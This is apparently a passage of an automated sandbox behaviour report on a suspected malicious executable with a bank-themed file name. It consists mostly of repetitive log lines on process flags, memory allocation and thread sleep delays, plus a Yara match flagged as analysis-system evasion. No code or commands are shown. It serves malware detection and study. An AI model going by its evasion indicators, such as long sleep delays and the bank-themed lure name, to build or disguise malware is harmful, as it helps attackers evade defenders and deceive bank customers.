Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: Yara match

File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: E10000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 2800000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 2750000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 77C0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 87C0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 8970000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 9970000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 1180000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 2D30000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 2A80000 memory reserve | memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 600000			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599891			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599782			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599657			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599532			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599407			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599297			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599188			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599063			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598938			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598813			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598688			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598577			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598469			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598344			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598235			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598110			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597969			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597844			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597735			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597610			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597485			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597360			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597235			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597110			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596985			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596860			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596735			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596610			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596485			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596360			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596235			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596110			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595985			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595860			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595735			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595610			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595485			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595360			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595235			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595110			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594985			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594860			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594735			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594610			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594485			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594360			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594235			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594110			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 593985			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5980			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3844			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Window / User API: threadDelayed 1689			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Window / User API: threadDelayed 8131			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Window / User API: foregroundWindowGot 1773			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep count: 36 > 30			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -33204139332677172s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -600000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599891s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7904	Thread sleep count: 1689 > 30			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7904	Thread sleep count: 8131 > 30			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599782s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep count: 39 > 30			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599657s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599532s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599407s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599297s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599188s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599063s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598938s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598813s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598688s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598577s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598469s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598344s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598235s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598110s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597969s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597844s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597735s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597610s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597485s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597360s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597235s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597110s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596985s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596860s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596735s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596610s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596485s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596360s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596235s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596110s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595985s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595860s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595735s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595610s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595485s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595360s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595235s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595110s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594985s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594860s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594735s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594610s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594485s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594360s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594235s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594110s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -593985s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
